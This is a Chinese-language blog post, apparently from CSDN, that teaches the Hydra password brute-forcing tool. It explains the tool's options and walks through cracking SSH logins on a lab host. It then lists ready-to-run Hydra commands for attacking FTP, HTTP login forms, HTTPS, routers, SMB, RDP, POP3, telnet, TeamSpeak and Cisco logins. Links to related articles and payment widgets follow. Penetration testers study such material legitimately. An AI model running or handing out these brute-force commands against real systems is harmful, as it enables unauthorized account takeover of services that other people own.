密码爆破工具——九头蛇(hydra)

最新推荐文章于 2024-05-09 17:08:28 发布
最新推荐文章于 2024-05-09 17:08:28 发布
阅读量1.9k 收藏 11
点赞数 1
文章标签: 网络 网络安全 安全 计算机网络 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42801460/article/details/129727611
版权

九头蛇hydra

记得美国队长中的大反派hydra(九头蛇)组织吗?

今天介绍的这款渗透测试工具,也叫这个名字。​

hydra是著名组织thc的一款开源的暴力破解密码工具,功能非常强大

kali下是默认安装的,几乎支持所有协议的在线破解。

 

密码能否破解,在于字典是否强大以及电脑的性能。

我们就介绍下,这个装备怎么用

 

使用方法

语法:Hydra 参数 IP 服务
复制代码

参数:
-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数,默认是16
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。
复制代码

service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。
注意点:1.自己创建字典,然后放在当前的目录下或者指定目录。
2.参数可以统一放在最后,格式比如hydra ip 服务 参数。
3.如果能确定用户名一项时候,比如web登录破解,直接用 -l就可以,然后剩余时间破解密码。
4.缺点,如果目标网站登录时候需要验证码就无法破解。
5.man hydra最万能。
6.或者hydra -U http-form等查看具体帮助。
复制代码

案例分析

暴破ssh登录密码

环境介绍

攻击机:kali
装有hydra工具

靶机:192.168.154.131
安装ssh服务,正常运行
复制代码

为了测试方便,我们创建两个简单的字典文件,如下:

 

开始爆破

根据命令参数,组织参数格式如下:

root@kali:/mnt# hydra -L user.txt -P password.txt -t 2 -vV -e ns 192.168.154.131 ssh
复制代码

破解成功

因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。

测试登录

使用得到的用户名/密码登录服务器,登录成功

 

各种协议破解汇总

FTP协议破解

破解ftp:

hydra -L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -v
复制代码

http协议破解

get方式提交,破解web登录:

hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns IP地址 http-get /admin/
hydra -L 用户名字典 -P 密码字典 -t 线程 -v -e ns -f IP地址 http-get /admin/index.php

post方式提交,破解web登录:

hydra -f -l 用户名 -P 密码字典 -V -s 9900 IP地址 http-post-form "/admin/index.php?action=login:user=USER&pw=PASS:"


#/index.php …这个是登录的 url
#后门是POST的数据 其中的用户名密码使用 USER PASS 来代替
#然后是如果登录出错 会出现的字符 。。。然后开始破解
复制代码

https协议破解

破解https

hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https
复制代码

路由器破解

hydra -l admin -x 6:10:1a.~!@#$%^&()-= -t 8 192.168.1.1 http-get /
-l admin 为尝试破解的用户名。

# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。-t 8 表示分 8 个并行任务进行爆破尝试。192.168.1.1 为 Router 地址。http-get 为破解方式(协议)
复制代码

http-proxy协议破解

破解http-proxy:

hydra -l admin -P 字典.txt http-proxy://IP地址
复制代码

smb破解

破解smb:

hydra -l 用户名字典 -P 密码字典 IP地址 smb
复制代码

Windows远程桌面

破解rdp(windows远程登录):

hydra ip地址 rdp -l administrator -P 密码字典.txt -V
复制代码

邮箱pop3

破解邮箱pop3:

hydra -l 用户名 -P 密码字典.txt my.pop3.mail pop3
复制代码

telnet破解

hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V
复制代码

语音通讯工具teamspeak

hydra -l 用户名字典 -P 密码字典.txt -s 端口号 -vV ip teamspeak
复制代码

cisco

hydra -P 密码字典 IP地址 cisco
hydra -m cloud -P 密码字典 IP地址 cisco-enable

网络安全入门人员
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全 | 渗透工具Hydra安装使用详细教程
等风来
01-04 5566
Hydra,也称九头,是一款非常强大的暴力破解工具密码能否被破解关键在于字典是否足够强大),支持多种服务协议的账号和密码进行爆破,包括Web登录、数据库、SSH、FTP等服务,支持Linux、Windows、Mac平台安装。该工具支持以下协议的爆破Hydra在kali中自带,这里介绍windows下的安装方法。zip下载地址:https://gitcode.com/maaaaz/thc-hydra-windows/tree/master下载完成后解压: 再将thc-hydra-windows-mast
九头hydra密码爆破工具
m0_74025111的博客
10-15 273
#$%^&()-= -t 8 192.168.1.1 http-get / -l admin 为尝试破解的用户名。# -x 6:10:1a. 表示枚举的密码由 数字、小写字母和单字符’.'等等组成,长度为 6 - 10 位。hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V。因为字典数量比较少,我们可以轻易的破解成功,但是实际情况下,我们可能需要很久。HYDRA是著名组织THC的一款开源的暴力破解密码工具,其功能非常强大的。
hydra Windows版,txt字典
04-02
hydra Windows版,txt字典
网络安全最全Hydra密码爆破工具使用教程图文教程(超详细),2024年最新含泪整理面经
最新发布
2401_84254343的博客
05-09 708
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。我们的密码字典中有三个密码,它也会执行三次,并把执行过程列了出来。
Hydra密码爆破工具使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
m0_61869253的博客
09-07 3766
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
hydra-字典暴力破解
告白的博客
07-30 9099
0x00 暴力破解简介 暴力破解是指通过反复试错的方法来尝试破解密码或用户名。. 这是一种较老的攻击方法。在许多场景任然是比较好的方法,今天更新一篇关于字典以及暴力破解随笔 0x01 字典介绍 生成字典的方法以及工具都有很多,字典的高效在于字典所储存内容对即将要破解的对象的敏感性大不大,当然一个10T容量的字典,当然是储存的东西非常多无所不能,但是还是不太切换实际,更多需要高效性。字典网上有很多,也可以根据特点来生成相对应特征的字典提高破解效率,下面简单介绍一下字典以及工具。 0x02 爆破工具
Hydra密码爆破工具使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
12-06 2万+
Hydra也叫九头,是一款开源的暴力PJ工具,集成在kali当中。
九头安全测试工具Hydra v9.1)
08-10
一款功能强大,目的合法,易于操作的安全测试工具 此Windows适用版本为Thomas D.提供的脚本,供大家研究学习之用 下载后直接解压至D盘即可(任意)
hydra密码爆破字典压缩后120M,password压缩前386M。
03-03
hydra密码爆破字典压缩后120M,压缩前386M。下的别人的,共享出来
密码爆破DOS运行_hydra-7.3-windows.7z
02-13
暴力猜解即是穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕。若某个情况验证符合题目的全部条件,则为本问题的一个解;...
hydra-antlia:九头的功能集合
05-22
用纯净的九头做几何图形的工作可能真的很乏味。 毕竟,Hydra的灵感来自于模拟模块化合成器。 在尝试在Hydra内绘制一些标记并意识到模拟信号的思维方式对于特定目标如此直观时,我开始了Antlia的工作。 我想多...
hydra windows版
06-26
hydra渗透人员必备工具,基于协议爆破密码,能够爆破21,22,3389,1433,1521等并且附带使用说明。
Hydra(九头)密码破解工具的详细使用教程
黄乔国PHP
07-16 4643
Hydra是⼀款开源的暴⼒密码pojie⼯具,⽀持多种协议密码的破译。可以对多种服务的账号和密码进行爆破,包括 数据库、SSH、FTP 等服务,在 Kali Linux 中自带 Hydra。有了这个工具就可以很方便的对密码进行破解。其简单的使用参数如下:完整参数可以使用-h来查看:支持爆破的服务也很多:如http,ftp,redis, mysql,mssql, mongod等等。
【Kali】中密码暴力破解工具hydra的使用
xueshenlaila的博客
03-10 1万+
前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。本文仅从安全角度去讲解工具的使用,请勿用于非法用途。 hydra参数讲解 -R #继续从上一次进度接着破解。 -S #采用SSL链接。 -s #PORT 可通过这个参数指定非默认端口。 -l #LOGIN 指定破解的用户,对特定用户破解。 -L #FILE 指定用户名字典。 -p #PASS 小写,指定密码破解,少用,一般是采用密
hydra字典破解smb协议及后续提权
wlopghost的博客
03-25 1159
首先先将kali与win-xp设置为同一网段使之两者ping通(在主机上将vmnet1和8都设置为自动获取ip,在虚拟机内将两台虚拟机都设置为桥接模式,此时两台虚拟机都有了一个ip但网段不同,查看kali网段然后手动将win-xp的网段改到和kali一样的网段即可。-e nsr 可选选项,n:空密码试探,s:使用指定用户和密码试探,r:指定密码与用户名相反。-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
爆破密码-hydra
无痕的博客
02-15 1万+
hydra爆破密码
黑客工具hydra详细使用教程
2301_80115097的博客
10-10 1565
Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。展示安全研究人员从远程获取一个系统认证权限。
应用协议安全Hydra 端口爆破工具.(九头
网络安全领域___专研者.
05-16 3229
Hydra 也叫九头,是一款开源的暴力PJ工具,集成在kali当中。可以对多种服务的账号和密码进行爆破,包括 Web 登录、数据库、SSH、FTP 等服务.
hydra爆破工具的缺点
04-22
Hydra爆破工具的缺点可能包括以下几点: 1. 并发请求限制:由于Hydra工具默认使用多线程发起请求,这就有可能导致在一些情况下,服务器会拒绝服务或者被防火墙屏蔽。 2. 特定协议支持不完善:虽然Hydra支持多种协议(如FTP,SSH,Telnet等),但它的支持在某些情况下可能并不完善,导致无法进行爆破或者出现其他问题。 3. 较为依赖字典Hydra爆破成功率较大程度上取决于字典的质量和字典中包含的密码种类和数量,因此在字典的选择和使用上需要慎重。 4. 可能存在误报和漏报:在进行爆破过程中,由于网络传输、响应等环节存在不确定性,因此可能会存在一定概率的误报或漏报。 需要注意的是,Hydra作为一个开源的工具爆破行为可能违反法律法规,请合法使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值